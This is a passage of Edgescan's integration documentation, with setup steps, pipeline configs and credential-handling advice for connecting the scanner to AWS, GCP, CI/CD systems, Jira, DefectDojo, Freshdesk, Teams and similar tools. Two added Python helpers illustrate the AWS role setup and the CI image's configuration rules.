Once your new user account is ready, you'll need to generate an access/secret key pair. AWS have a guide on how to do this; here are the main steps:
1. In the IAM console under Users, click on the new user's name.
2. Select the Security credentials tab.
3. Click Create access key in the Access keys section to create a key pair that consists of an Access key ID and Secret access key.
4. Take note of both of these keys and provide them to edgescan.
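As an added illustration of the role-based (STS) setup above, and not part of Edgescan's own documentation or tooling: a small Python helper that checks an external ID follows the documented `edgescan-cloud-onboard-` prefix, builds the trust policy the "Another AWS account" + "Require external ID" wizard produces, lists the three read-only managed policies to attach, and reviews a role for the deviations the page warns about (missing external ID, AdministratorAccess). Edgescan's real AWS account ID is not on the page, so the code uses a placeholder.

```python
import json
import re

# Prefix the documentation requires for the external ID, e.g. edgescan-cloud-onboard-159ahw8Vq736lmbi.
EXTERNAL_ID_PREFIX = "edgescan-cloud-onboard-"

# Managed policies the documentation says the role needs, with the stated purpose of each.
REQUIRED_MANAGED_POLICIES = {
    "IAMReadOnlyAccess": "fetch the account alias",
    "AmazonEC2ReadOnlyAccess": "fetch EC2 Elastic IP addresses",
    "AmazonRoute53ReadOnlyAccess": "fetch Route 53 hostnames",
}

# Characters AWS accepts in an external ID; the unique suffix must also be non-empty.
_EXTERNAL_ID_SUFFIX = re.compile(r"^[\w+=,.@:/-]+$")


def validate_external_id(external_id: str) -> bool:
    """True when the external ID uses the documented prefix followed by a usable unique suffix."""
    if not external_id.startswith(EXTERNAL_ID_PREFIX):
        return False
    suffix = external_id[len(EXTERNAL_ID_PREFIX):]
    return bool(_EXTERNAL_ID_SUFFIX.match(suffix))


def build_trust_policy(edgescan_account_id: str, external_id: str) -> dict:
    """Trust policy equivalent to choosing 'Another AWS account' and 'Require external ID'.

    The sts:ExternalId condition is what stops a third party from asking the scanning
    account to assume this role on their behalf (the confused-deputy problem).
    """
    if not re.fullmatch(r"\d{12}", edgescan_account_id):
        raise ValueError("AWS account IDs are 12 digits")
    if not validate_external_id(external_id):
        raise ValueError(f"external ID must start with {EXTERNAL_ID_PREFIX!r} and carry a unique suffix")
    return {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Principal": {"AWS": f"arn:aws:iam::{edgescan_account_id}:root"},
                "Action": "sts:AssumeRole",
                "Condition": {"StringEquals": {"sts:ExternalId": external_id}},
            }
        ],
    }


def managed_policy_arns() -> list:
    """ARNs of the three read-only AWS managed policies to attach to the role."""
    return [f"arn:aws:iam::aws:policy/{name}" for name in REQUIRED_MANAGED_POLICIES]


def review_role(trust_policy: dict, attached_policy_arns: list) -> list:
    """Return findings for a role that deviates from the documented least-privilege setup."""
    findings = []
    for stmt in trust_policy.get("Statement", []):
        if stmt.get("Action") != "sts:AssumeRole" or stmt.get("Effect") != "Allow":
            continue
        ext = stmt.get("Condition", {}).get("StringEquals", {}).get("sts:ExternalId")
        if not ext:
            findings.append("AssumeRole statement has no sts:ExternalId condition")
        elif not validate_external_id(ext):
            findings.append(f"external ID {ext!r} does not follow the documented prefix")
    names = {arn.rsplit("/", 1)[-1] for arn in attached_policy_arns}
    for name in REQUIRED_MANAGED_POLICIES.keys() - names:
        findings.append(f"missing managed policy {name}")
    if "AdministratorAccess" in names:
        findings.append("AdministratorAccess attached; the three read-only policies are sufficient")
    return findings


if __name__ == "__main__":
    # Placeholder account ID: Edgescan's real account ID must be requested from them.
    policy = build_trust_policy("123456789012", "edgescan-cloud-onboard-159ahw8Vq736lmbi")
    print(json.dumps(policy, indent=2))
    print(review_role(policy, managed_policy_arns()))
```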
Excerpt: AWS Onboarding Integration – STS Authentication

### Google Cloud

#### Google Cloud Platform Onboarding Integration

Keeps your External IP addresses and hostnames from Cloud DNS updated as assets in edgescan.

#### Enable Google Cloud APIs

In order for the Google Cloud integration to work, you'll need to enable some APIs using the GCP console. Select your project, then under APIs & Services click Enable APIs and Services. Use the search to find the following APIs and enable them:
- Compute Engine API (required to sync external and ephemeral IP addresses)
- Cloud Resource Manager API (required to sync external and ephemeral IP addresses)
- Google Cloud DNS API (required to sync Google Cloud DNS records)

#### Connect Google Cloud Platform

1. Go to the IAM & Admin menu in your GCP console.
2. Click on Service Accounts and then click Create Service Account.
3. Give your new service account a name and a description, then click Create.
4. Grant the service account Compute Network Viewer and DNS Reader permissions to your project; these are required to list your external IP addresses and DNS hostnames.
5. Click the Create Key button to download the key file for your new service account. Select to create the key in JSON format, download the key file and keep it in a safe place. This key grants read access to your project.
6. Provide edgescan with the key file.

Excerpt: Keeps your External IP addresses and hostnames from Cloud DNS updated as assets in edgescan.

### Axonius

#### How to Integrate Edgescan

- Domain (required) – The hostname of the Edgescan server.
- API Key (required) – The API Key that has read access to the server.
- Verify SSL (required, default: False) – Verify the SSL certificate offered by the host supplied in EdgeScan Domain. For more details, see SSL Trust & CA Settings. If enabled, the SSL certificate offered by the host will be verified against the CA database inside of Axonius. If it fails validation, the connection will fail with an error.
If disabled, the SSL certificate offered by the host will not be verified against the CA database inside of Axonius.
- HTTPS Proxy (optional, default: empty) – A proxy to use when connecting to EdgeScan Domain. If supplied, Axonius will utilize the proxy when connecting to the host defined for this connection. If not supplied, it will connect directly to the host defined for this connection.

Excerpt: Axonius is a cybersecurity asset management platform that can give organizations a comprehensive asset inventory. Edgescan’s integration allows users to synchronize vulnerability and asset data into the Axonius platform to deliver a comprehensive and credible asset inventory for security, IT and risk teams.

### Azure Pipelines

#### How to Integrate Edgescan & Azure Pipelines

With the Azure Pipelines connector for Edgescan, you can build application vulnerability scans into existing CI/CD processes. The connector allows DevOps teams to initiate VM scanning directly from their pipelines. Once initiated, a scan will take place, and a pass/fail will be returned depending on configured criteria. The build will fail if the results do not match the configured criteria. Otherwise, the build will proceed to the next step if applicable.

Edgescan makes it easy to add security scanning to Azure Pipelines. The basic steps are:
1. Configure your Pipeline by adding or editing the azure-pipelines.yml file in your project repository
2. Configure Edgescan by CLI or with environment variables
3. Secure your API key as a secret Variable in your Pipeline

#### Edgescan API Key

When you signed up with Edgescan, you created an API key. You will need this API key, so be sure to record it.

#### Create a Git Repo

If you don’t already have a Git repo, go ahead and create one for this tutorial. We recommend Azure Repos, Bitbucket, or GitHub for ease of integration.
#### Configure Your Azure Pipelines

At the base directory of your code repository, add an azure-pipelines.yml file to configure Azure Pipelines to run Edgescan:

```yaml
pool:
  vmImage: 'ubuntu-latest'

jobs:
  - job: Remote_Scan
    steps:
      - script: >
          docker run -t
          -e ES_API_TOKEN="${ES_API_TOKEN}"
          -e ES_ASSET="${ES_ASSET_ID}"
          edgescan/cicd-integration
        displayName: Run Edgescan
        env:
          # Populated from the secret Pipeline Variables created below
          ES_API_TOKEN: $(es_api_token)
          ES_ASSET_ID: $(es_asset_id)
```

This configuration tells Pipelines to run a single job which runs the Edgescan Docker image. The job will pass the Edgescan API token and your asset ID as environment variables, taken from some secret Pipeline Variables, which we will set up momentarily. The job will wait for the scan results before finishing. The final command could also pass the values as CLI flags (note that the asset ID goes to --asset-id and the token to --api-token):

```
docker run -t edgescan/cicd-integration --asset-id ${ES_ASSET_ID} --api-token ${ES_API_TOKEN}
```

Add, commit, and push azure-pipelines.yml to your Git repository.

#### Create an Azure Pipeline

Make sure the file above has been pushed to your central Git repo so that Azure Pipelines can find it. From your Azure DevOps Console, select (or create) the Project you wish to add a Pipeline to. From your Project, select Pipelines from the left pane. Then click the blue New Pipeline button to create a new Pipeline. From here, Azure will step you through the process of adding your repository, as follows:

- Where is your code? – Select your provider: Azure Repos, Bitbucket, or GitHub
- Select a repository – Select the repo you just pushed your new configuration to
- Configure your pipeline – Select “Existing Azure Pipelines YAML File”
- Select an Existing YAML File – Enter azure-pipelines.yml in the Path field
- Review your pipeline YAML – Click the grey Variables button
- Variables – Click the blue New variable button

In the New variable dialogue, name your variable es_api_token, and add your Edgescan API key as the Value. Check the box to Keep this value secret. Save the variable.
Do the same for your asset ID and name it es_asset_id.

#### Run It

Now that you have identified your Pipeline configuration file and saved your API key and asset ID as Variables, Pipelines will allow you to Review your pipeline YAML. It should contain exactly the Pipeline code you entered above. Hit the blue Run button, and watch your pipeline run. You should see the Edgescan container run and print some summary information to the screen when the scan is complete.

Excerpt: Azure Pipelines automatically builds and tests code projects to make them available to others. It works with just about any language or project type. Azure Pipelines combines continuous integration (CI) and continuous delivery (CD) to test and build your code and ship it to any target.

### Azure Sentinel

#### How to Integrate Edgescan & Azure Sentinel

This package contains three separate logic apps:
- edgescan_vulnerabilities
- edgescan_assets
- edgescan_hosts

The end goal of this document is to set up Azure Sentinel logic apps that run daily and ingest records created in Edgescan over the past two days. The logic apps will scan the entries created within the last 7 days in the custom logs in Azure Sentinel for duplicate IDs before adding a new entry to the corresponding log. The logic app templates you will deploy, however, are created for the initial run: they are missing this duplicate-checking logic and are instead geared to pull in all data. This documentation will walk you through executing this initial run and then through the changes needed to achieve the end goal.
Entries will be stored in Azure Sentinel custom logs with the following table names:
- edgescan_vulnerabilities_CL
- edgescan_assets_CL
- edgescan_hosts_CL

#### Viewing Custom Logs

1. From your home page, navigate to the Azure Sentinel service.
2. There, select the workspace your deployed logic apps reference.
3. There, click on Logs in the left-hand menu and expand Custom Logs.

Excerpt: Azure Sentinel delivers intelligent security analytics and threat intelligence across the enterprise, providing a single solution for attack detection, threat visibility, proactive hunting, and threat response.

### CI/CD

Edgescan has identified the need to shift left and identify vulnerabilities earlier in the software development lifecycle. For this reason, a fully supported plugin was developed for CI/CD pipelines. This integration allows DevOps teams to initiate VM scanning from their chosen platform. Once initiated, a scan will take place, and a pass/fail will be returned depending on configured criteria. The build will fail if the results do not match the configured criteria. Otherwise, the build will proceed to the next step if applicable. This Docker image can be deployed to any appropriate environment.

#### Edgescan CI/CD integration

This image allows you to kick off an assessment and fails or succeeds according to its result. It succeeds if the assessment completes with no vulnerabilities found (a tolerance for the risk level can be provided); otherwise it fails. When it’s not waiting for the scan to finish, it succeeds once the assessment is started. The program will exit with value 0 on success and -1 otherwise.

#### Getting started

Pull the Docker image:

```
docker pull edgescan/cicd-integration
```

Execute the Docker image and append --help for details about its usage:

```
docker run --tty edgescan/cicd-integration --help
```

Configuration can be provided in 3 ways (in order of priority):
1. CLI flags
2. YAML configuration file
3. Environment variables

| Parameter | Command line flag | Field name in configuration file | Environment variable name | Default value | Required |
|---|---|---|---|---|---|
| Asset ID | --asset-id | asset_id | ES_ASSET_ID | None | True |
| API Token | --api-token | api_token | ES_API_TOKEN | None | True |
| Base URL | --base-url | base_url | ES_BASE_URL | “https://live.edgescan.com” | False |
| Max Risk Threshold | --max-risk-threshold | max_risk_threshold | MAX_RISK_THRESHOLD | 3 | False |
| Wait | --wait / --no-wait | wait | WAIT | True | False |
| Color | --color / --no-color | color | COLOR | True | False |
| Proxy | --proxy | proxy | PROXY | None | False |

#### Execute the Docker image

Executing with the command line interface:

```
docker run --tty edgescan/cicd-integration --asset-id 1234 --api-token th34p1t0ken
```

Executing with a YAML config file:

```
docker run --tty -v /local/path/to/file.yml:/cicd-config.yml edgescan/cicd-integration
```

Executing with environment variables:

```
docker run --tty -e ES_API_TOKEN="th34p1t0ken" -e ES_ASSET=1234 edgescan/cicd-integration
```

Executing with a dotenv file:

```
docker run --tty --env-file .env edgescan/cicd-integration
```

Executing with all 3 methods:

```
docker run --tty -v /path/to/file.yml:/cicd-config.yml --env-file .env edgescan/cicd-integration --asset-id 1234
```

Excerpt: In software engineering, CI/CD or CICD is the combined practices of continuous integration and either continuous delivery or continuous deployment. CI/CD bridges the gaps between development and operation activities and teams by enforcing automation in building, testing and deployment of applications.

### Cortex XSOAR

#### How to Integrate with Edgescan

Cortex-xsoar & Edgescan Integration Documentation

Excerpt: Cortex XSOAR is a comprehensive security orchestration, automation and response (SOAR) platform that unifies case management, automation, real-time collaboration and threat intel management to serve security teams across the incident lifecycle.

### DefectDojo

#### How to Integrate Edgescan & DefectDojo

#### Import Vulnerabilities as JSON

Export Edgescan Vulnerabilities as JSON: To export Vulnerabilities, log in to https://live.edgescan.com.
1. Click Vulnerabilities in the top menu bar, and add the necessary filters. For example, to get all open vulnerabilities for a specific asset, the following filters should be used:
   - Asset In “Example Asset”
   - Status Equal Open
2. Then, click the Export button in the top right of the screen.
3. Select Export as JSON and click Download here.

Import Vulnerabilities as Findings:
1. Go to the Product that you want to import the Vulnerabilities for.
2. In the top menu, click Findings and Import Scan Results.
3. Fill in the required fields:
   - Scan type: select Edgescan Scan, not Edgescan API Scan
   - Choose report file: select the vulnerabilities JSON file that was exported
4. Finally, click Import and the Findings should appear.

#### Import Vulnerabilities by API

Generate Edgescan API Key: An Edgescan API key will be required. To generate a key, log in to https://live.edgescan.com. In the top right of the menu bar, click the ? icon, and go to Account settings. In the Label input box, enter a token name and click Create. Take note of the generated API token.

DefectDojo Tool Configuration: Configure the Edgescan authentication details by navigating to Configuration / Tool Configuration, selecting the Tool Type “Edgescan” and the Authentication Type “API Key”. Paste your Edgescan API key in the “API Key” field. Click Submit.

DefectDojo API Scan Configuration: Go to the specific Product page and click Settings -> Add API Scan Configuration, then select the previously added Edgescan Tool Configuration. Provide the ID of the asset from which to import findings in the field Service key 1. Click Save.

Import Vulnerabilities as Findings: On the Product page, click Findings -> Import Scan Results. You can import the findings by selecting “Edgescan Scan” as the scan type and selecting the Edgescan API Scan Configuration. Click Import, and any open Vulnerabilities for the selected Asset will be imported as Findings.

Excerpt: DefectDojo is a security orchestration and vulnerability management platform.
DefectDojo allows you to manage your application security program, maintain product and application information, triage vulnerabilities and push findings to systems like JIRA and Slack. DefectDojo enriches and refines vulnerability data using a number of heuristic algorithms that improve the more you use the platform.

### Freshworks

#### Webhooks and Freshdesk Tickets

A Webhook is an HTTP request that is triggered when an event occurs. Event Webhooks allow you to send edgescan data to other applications. Freshdesk ticketing helps you keep track of many issues and assign them to the right agents.

#### Create a Freshdesk Authentication Header

Get your Freshdesk API key (Freshdesk's guide: How to find your API key). In order to use the API key, it needs to be encoded. If the API key is 4p1t0k3n, base64 encode it using the command:

```
echo -n "4p1t0k3n:X" | base64
```

The result is NHAxdDBrM246WA==, so the authentication header will be:

```
Authorization: Basic NHAxdDBrM246WA==
```

#### Set up the Freshdesk Event Webhook

1. On edgescan, navigate to the events page by going to Account/Settings -> Events.
2. Create a new event and give it an appropriate name.
3. In the first drop-down, select the event you want, e.g. vulnerability opened.
4. Enable Trigger a webhook event.
5. Enter https://<your-subdomain>.freshdesk.com/api/v2/tickets as the URL, where <your-subdomain> is your own Freshdesk subdomain.
6. Ensure the HTTP method is POST.
7. Add the authentication header from the section above.
8. Select JSON - Freshdesk as the payload. The ‘Send a separate request for each item’ checkbox will create a new ticket for each vulnerability when checked; otherwise it will create one ticket with many vulnerability details.
9. Save the event, and you’re all set up! You can test that it is working by using the Test -> Notification button in the top right.
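Returning to the CI/CD image documented above (the same image the GitHub Actions and Jenkins sections below run): as an added example, not the image's own source code, this Python sketch reproduces its documented configuration precedence (CLI flags over the YAML file over environment variables), coerces the string values an environment provides into the types of the defaults, and applies the pass/fail rule with and without --wait. Parameter names, environment variable names and defaults come from the page's table; the `risk` field on findings, the CLI dict keyed by setting name, and the reading that a finding with risk greater than the threshold fails the build are assumptions.

```python
from typing import Any, Dict, Iterable, Mapping, Optional

# (setting, CLI flag, YAML field, environment variable, default, required), as documented.
PARAMETERS = (
    ("asset_id", "--asset-id", "asset_id", "ES_ASSET_ID", None, True),
    ("api_token", "--api-token", "api_token", "ES_API_TOKEN", None, True),
    ("base_url", "--base-url", "base_url", "ES_BASE_URL", "https://live.edgescan.com", False),
    ("max_risk_threshold", "--max-risk-threshold", "max_risk_threshold", "MAX_RISK_THRESHOLD", 3, False),
    ("wait", "--wait/--no-wait", "wait", "WAIT", True, False),
    ("color", "--color/--no-color", "color", "COLOR", True, False),
    ("proxy", "--proxy", "proxy", "PROXY", None, False),
)

_TRUE = {"1", "true", "yes", "on"}
_FALSE = {"0", "false", "no", "off"}


def _coerce(value: Any, like: Any) -> Any:
    """Turn the string an environment variable provides into the type of the default."""
    if not isinstance(value, str) or like is None:
        return value
    if isinstance(like, bool):  # checked before int, because bool is a subclass of int
        low = value.strip().lower()
        if low in _TRUE:
            return True
        if low in _FALSE:
            return False
        raise ValueError(f"expected a boolean, got {value!r}")
    if isinstance(like, int):
        return int(value)
    return value


def resolve_config(cli: Mapping[str, Any], yaml_cfg: Mapping[str, Any],
                   env: Mapping[str, str]) -> Dict[str, Any]:
    """Merge the three sources in the documented order of priority: CLI > YAML file > environment.

    cli is assumed to hold parsed flags keyed by setting name (e.g. {"asset_id": "1234"});
    yaml_cfg is the loaded configuration file; env is os.environ or a dotenv file's contents.
    """
    resolved: Dict[str, Any] = {}
    missing = []
    for key, flag, field, env_name, default, required in PARAMETERS:
        if cli.get(key) is not None:
            value = cli[key]
        elif yaml_cfg.get(field) is not None:
            value = yaml_cfg[field]
        elif env_name in env:
            value = _coerce(env[env_name], default)
        else:
            value = default
        if required and value is None:
            missing.append(f"{key} ({flag}, {field} or {env_name})")
        resolved[key] = value
    if missing:
        raise ValueError("missing required configuration: " + "; ".join(missing))
    return resolved


def assessment_passes(findings: Iterable[Mapping[str, Any]], max_risk_threshold: int) -> bool:
    """Succeed only when no finding's risk exceeds the tolerance (assumed reading of the threshold)."""
    return all(int(f["risk"]) <= max_risk_threshold for f in findings)


def run_gate(config: Mapping[str, Any], assessment_started: bool,
             findings: Optional[Iterable[Mapping[str, Any]]]) -> bool:
    """Documented behaviour: without --wait, success means the assessment was started;
    with --wait, success means the finished assessment cleared the risk gate."""
    if not config["wait"]:
        return assessment_started
    if findings is None:
        raise RuntimeError("waited for the assessment but no results were returned")
    return assessment_passes(findings, config["max_risk_threshold"])


if __name__ == "__main__":
    # Constructed inputs: the asset ID on the CLI, the token in YAML, and an environment
    # that also sets an asset ID (ignored, CLI wins) and lowers the risk tolerance to 2.
    cfg = resolve_config(
        cli={"asset_id": "1234"},
        yaml_cfg={"api_token": "th34p1t0ken"},
        env={"ES_ASSET_ID": "999", "MAX_RISK_THRESHOLD": "2", "WAIT": "true"},
    )
    sample_findings = [{"name": "Missing security header", "risk": 2},   # constructed
                       {"name": "SQL injection", "risk": 5}]             # constructed
    passed = run_gate(cfg, assessment_started=True, findings=sample_findings)
    print(cfg)
    print("exit code", 0 if passed else -1)  # -1 here: a risk-5 finding exceeds the tolerance of 2
```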
### GitHub Actions

#### How to Integrate with Edgescan

With our Edgescan integration Docker image, it’s simple to add scanning to your GitHub Actions workflow. To integrate with Edgescan, simply:
1. Secure your API key as a Secret in your GitHub repository
2. Configure your workflow with a .github/workflows/edgescan.yml file
3. Configure Edgescan by CLI or with environment variables

#### Secure your API Key

When you signed up with Edgescan, you created an API key. To keep it a secret, and out of your repository, copy it to a GitHub secret for your repository. On GitHub, find your repository, and click into the ⚙️ Settings tab near the top right side of the screen. Then click Secrets near the bottom left. Add your Edgescan API key as a secret called ES_API_TOKEN, the name the workflow references. Other variables like the asset ID can also be set this way (the workflow expects it as ES_ASSET).

#### Configure Your Workflow

At the base directory of your code repository, add a .github/workflows/edgescan.yml file to configure GitHub Actions to run Edgescan. Your file should look like this:

```yaml
name: Edgescan

on:
  push:
  pull_request:

jobs:
  edgescan:
    name: Edgescan
    runs-on: ubuntu-latest
    steps:
      - name: Clone repo
        uses: actions/checkout@v2
      - name: Pull Edgescan Docker Image
        run: |
          docker pull edgescan/cicd-integration
      - name: Run Edgescan
        run: |
          docker run -t -e ES_API_TOKEN="${{ secrets.ES_API_TOKEN }}" -e ES_ASSET="${{ secrets.ES_ASSET }}" edgescan/cicd-integration
```

This configuration tells GitHub Actions to pull the Edgescan Docker image and, using your API token, scan your asset and wait for the results. The final command could also pass the values as CLI flags (the asset ID goes to --asset-id and the token to --api-token):

```
docker run -t edgescan/cicd-integration --asset-id ${{ secrets.ES_ASSET }} --api-token ${{ secrets.ES_API_TOKEN }}
```

#### Run It

Check the workflow file into source control, and push it to GitHub. Head over to the GitHub Actions console to watch your workflow run.

Excerpt: GitHub Actions is a continuous integration and continuous delivery (CI/CD) platform that allows you to automate your build, test, and deployment pipeline.
You can create workflows that build and test every pull request to your repository, or deploy merged pull requests to production.

### Jenkins

How to Integrate with Edgescan: the Edgescan plugin allows DevOps teams to initiate vulnerability management (VM) scanning directly from Jenkins. Once initiated, a scan takes place and a pass/fail result is returned depending on the configured criteria. The build fails if the results do not meet the configured criteria; otherwise it proceeds to the next step, if there is one.

Jenkins is the most popular CI/CD system in use today, with a rich ecosystem of plugins and virtually unlimited flexibility, and it is easy to get Edgescan integrated into its pipelines. Let's get started with a simple example.

#### Server Requirements

You will need a recent version of Jenkins with the default recommended set of plugins, which includes the Pipeline and Credentials plugins. Your server or build node needs Docker. For our test, we installed Jenkins and Docker on the same server and added the `jenkins` user to the `docker` group so that Jenkins jobs could access the Docker daemon:

```sh
sudo usermod -a -G docker jenkins
```

Be aware of what this grants: membership of the `docker` group is equivalent to root on that host, because any job that can talk to the daemon can start a privileged container or mount the host filesystem. Outside a test setup, run builds on a separate agent rather than on the Jenkins controller, and treat every job that can execute there as fully trusted.

#### Secure Your API Key

Save your Edgescan API key as a "Secret text" entry in Jenkins Credentials with the ID `ES_API_TOKEN`. You can later bind that secret to an environment variable, `ES_API_TOKEN`, in your pipeline script.

#### Configure Jenkins Pipeline

From the web console, create a new Jenkins Pipeline job. In the job configuration, set the Pipeline section to point to a `Jenkinsfile` in your code repository. Usually this file lives in the root of your repository.

Next, create a `Jenkinsfile` at the base of your code repository with the following contents:

```groovy
pipeline {
    agent any
    stages {
        stage("Pull Edgescan Image") {
            steps {
                sh 'docker pull edgescan/cicd-integration'
            }
        }
        stage("Run Edgescan Test") {
            environment {
                // Bound from the "Secret text" credential with ID ES_API_TOKEN.
                ES_API_TOKEN = credentials('ES_API_TOKEN')
                // The Edgescan asset ID to scan; replace with your own.
                ES_ASSET = '12345'
            }
            steps {
                // Triple single quotes: Groovy does not interpolate the secret into
                // the script text; the shell expands ${ES_API_TOKEN} from the
                // environment at run time instead.
                sh '''
                    docker run -t \
                      -e ES_API_TOKEN=${ES_API_TOKEN} \
                      -e ES_ASSET=${ES_ASSET} \
                      -e WAIT=true \
                      edgescan/cicd-integration
                '''
            }
        }
    }
}
```

Note that entries in a declarative `environment` block are separated by newlines, not commas, and that values must be quoted strings or `credentials()` calls. Keeping the `sh` step in single quotes is the important security detail: with double quotes, Groovy would interpolate the credential into the command string before Jenkins' secret masking has a chance to apply.

#### Run It

Check the `Jenkinsfile` into source control. Start your job from Jenkins and watch it run from Console Output. You should see your scan initiate, run, and print a summary of results. Also check your account at Edgescan to review your scan details.

CI/CD Documentation

Excerpt: Jenkins is an open-source automation tool written in Java with plugins built for Continuous Integration purposes. It is used to continuously build and test your software projects, making it easier for developers to integrate changes to the project and easier for users to obtain a fresh build. It also allows you to continuously deliver your software by integrating with a large number of testing and deployment technologies.

### Jira Cloud

How to Integrate with Edgescan: the Edgescan plugin for Jira Cloud provides a means to link Edgescan assets to Jira projects. It can be configured to retrieve vulnerability data from the Edgescan API, open a Jira issue for each new vulnerability, and automatically transition issues when the linked vulnerability is closed. This documentation assumes familiarity with the concepts and configuration used by both Edgescan and Jira.

#### Installing the plugin

The Edgescan plugin installation URL is: edgescan Jira cloud plugin | Atlassian Marketplace

1. Click Get it now.
2. Select the site to install the app on.
3. Click Install app.
4. When brought to another page, click Get it now again.
#### Authorising the Plugin

The host Jira instance must be authorised to access Edgescan using an API token (see the Edgescan user documentation for details on how to generate one). Once the app is installed, a pop-up appears in the bottom left corner of the page; select Configure. Alternatively, go to Apps -> Manage your apps and configure the app there. Enter the API token into the resulting field and click Save; a message indicates whether authorisation was successful.

This token gives the app read access to vulnerability data for every asset you later link, so generate it for a dedicated integration user rather than reusing a named person's token, and replace it if that user's access changes.

#### Linking Projects

To configure a link between a Jira project and one or more Edgescan assets, navigate to the project link configuration page at Project Settings -> Apps -> Link to edgescan and select Edit near the bottom of the page. The following configuration options are available:

- Linked Assets: the Edgescan assets you wish to link to this project. You must select at least one.
- Risk Mapping: each Edgescan risk rating may be mapped to a Jira priority. Issues created from a vulnerability with a particular risk rating will have the mapped priority. If a risk rating is set to Ignore, no issues will be created for vulnerabilities of that risk.
- Create Issue with Type: issues created by the app will have this type.
- Add to Epic (optional): issues will be added to the specified epic on creation.
- Add to Task: issues created with type Subtask will be added to the specified task on creation. This option only appears if issues are created with type Subtask.
- Assign to (optional): issues will be assigned to the specified user on creation.
- Status on Create: issues will be transitioned to this status on creation.
- Status on Close: issues will be transitioned to this status when the linked vulnerability is closed. For the plugin to operate correctly, ensure that a transition to this status is always available.

#### Syncing Projects

Syncing is the process of opening or transitioning issues based on the latest vulnerability data from Edgescan. When a sync is performed, the app retrieves vulnerability data from Edgescan; an issue is opened for each new vulnerability, and if a vulnerability has been closed the linked issue is transitioned to the configured Status on Close. Syncing can be performed automatically or manually:

- Automatic Sync is disabled by default and can be enabled by clicking the Enable Auto-Sync button on the project link configuration page. When enabled, a sync is performed automatically every 5 minutes.
- Manual Sync is only available if Auto-Sync is disabled. Trigger a sync by clicking the Sync Now button on the project link configuration page.

#### Created Issues

Issues created by the plugin have the type, priority, and status configured in the project link, and are added to an epic and/or assigned to a user if so configured. The title is in the following format: @

The description lists the details of the vulnerability and provides a link to the vulnerability in the Edgescan portal.

#### Important Points about Syncing

The first sync performed on a project may take a long time, depending on the number of issues it has to create. Similarly, if the project link configuration is edited, the next sync is more thorough than usual in order to ensure consistency between Jira and Edgescan. Allow 15 minutes for the first sync, and for subsequent configuration changes to take effect.

The effect of changing each configuration option is as follows:

- If an asset associated with a link is deselected, any issues linked to vulnerabilities on that asset are deleted.
- If the priority mapping for a risk is changed to Ignore, any issues linked to vulnerabilities of that risk rating are deleted.
- If the priority mapping for a risk is changed, any issues linked to vulnerabilities of that risk rating are updated to the correct priority.
- If the Create with Type setting is changed, all issues are updated to the correct type.
- If the Add to Epic, Add to Task, or Assign to settings are changed, existing issues are unchanged; the change applies only to issues created in the future.
- If the Status on Create or Status on Close settings are changed, the status of existing issues is unchanged; the change applies only to issues created in the future.

Note that the first two rules delete issues outright. Deselect an asset or set a risk to Ignore deliberately, not as a way of hiding findings, and expect any discussion recorded on those issues to go with them.

Excerpt: Jira Cloud is built for every member of your software team to plan, track, and manage their work. Using the Atlassian platform, you can dynamically show information about issues, build new workflows and features, or integrate Jira with an existing service.

### Kenna Security

Get a Kenna API key: API Key

Get a Kenna connector ID:

1. On the Kenna homepage, select Connectors in the top navigation bar.
2. Select Add Connector.
3. Select the Kenna Data Importer.
4. Name the connector and set the asset inactivity limit.
5. Select the new connector and record the connector ID.

Get the Kenna Toolkit: the easiest way to get started is to use the pre-built image on Docker Hub:

```sh
docker pull kennasecurity/toolkit
```

It can also be built from source by cloning the toolkit repository.

Run the Kenna Toolkit: there are four primary parameters to pass to the Kenna toolkit:

task=edgescan
edgescan_token=''
kenna_api_key=''
kenna_connector_id=

Full list of parameters can be found below.

Calling a specific task with Docker (the token and key values here are dummies):

```sh
docker run -it --rm kennasecurity/toolkit:latest task=edgescan edgescan_token='es4p1t0k3n|12345' kenna_api_key='k3nna4p1k3y' kenna_connector_id=12345
```

If you built the image from source instead, use the tag you gave it, for example `toolkit:latest`. Both the Edgescan token and the Kenna API key are passed as command-line arguments, so they end up in your shell history and are visible in the process list while the container runs. Run this from a CI step that injects the values, or at least from a shell session whose history you control, rather than typing live credentials at an interactive prompt.

Excerpt: Kenna automates the correlation of vulnerability data, threat data, and zero-day data, analyzing security vulnerabilities against active Internet breaches so that InfoSec teams can prioritize remediations and report on their overall risk posture.

### Microsoft Teams

Setting up a workflow with Edgescan and MS Teams.
With this integration, you can integrate Edgescan events into your existing workflow by using a Microsoft Teams channel webhook. In the following use case, a notification is sent to the selected channel when a vulnerability is opened in Edgescan on any asset and the risk is at least high.

Two main steps are needed to integrate MS Teams with Edgescan:

1. Create an incoming webhook for the selected Teams channel.
2. Create the Edgescan event that triggers the notification.

#### Creating an incoming webhook for the selected Microsoft Teams channel

1. Go to the channel where you want to add the webhook and select ••• More options from the top navigation bar.
2. Select Connectors from the drop-down menu.
3. Search for Incoming Webhook and select Add.
4. Select Configure, provide a name, and upload an image for your webhook if required.
5. The dialogue window presents a unique URL that maps to the channel. Copy and save the webhook URL, which is what Edgescan will post to, then select Done.

The webhook is now available in the Teams channel. Treat the URL as a secret: it is the only credential involved, and anyone who obtains it can post arbitrary messages into the channel. Microsoft has also announced the retirement of Office 365 Connectors in Teams in favour of Workflows, so consult the current Teams documentation if the Connectors menu is no longer offered to you.

#### Create the Edgescan event to trigger the notification

1. Navigate to the Events page and select + Add event.
2. Give the event a name, e.g. "Vulnerability is opened on any asset when risk is at least high".
3. Fill out the required conditions for the event.
4. Activate "Trigger a webhook".
5. Enter the incoming Microsoft Teams webhook URL and select the Microsoft Teams payload.
6. Save and test the webhook.

Excerpt: Microsoft Teams is a unified communication and collaboration platform that combines persistent workplace chat, video meetings, file storage (including collaboration on files), and application integration. This integration allows for the triggering of notifications in relation to the following

### RiskSense

How to Integrate with Edgescan: RiskSense Connector Documentation

Excerpt: RiskSense prioritizes vulnerabilities from CVEs and CWEs, and their trending threat context.
This new approach delivers a common way to express risk exposure across infrastructure and applications.

### ServiceNow

Webhooks and ServiceNow Incidents

A webhook is an HTTP request that is triggered when an event occurs. Edgescan event webhooks allow you to send Edgescan data to other applications. A security incident is an unplanned security-related interruption that has occurred in your organisation. It can be recorded in ServiceNow as an event, an ITSM incident, or a security incident, and Edgescan can post to any of the three tables.

Before setting up the integration, check with your ServiceNow account manager that your organisation has a subscription for Event Management if you intend to use the event endpoint. To create security incidents, the Security Incident Response application, which provides the `sn_si_incident` table, must be installed on your instance.

#### Create a ServiceNow Authentication Header

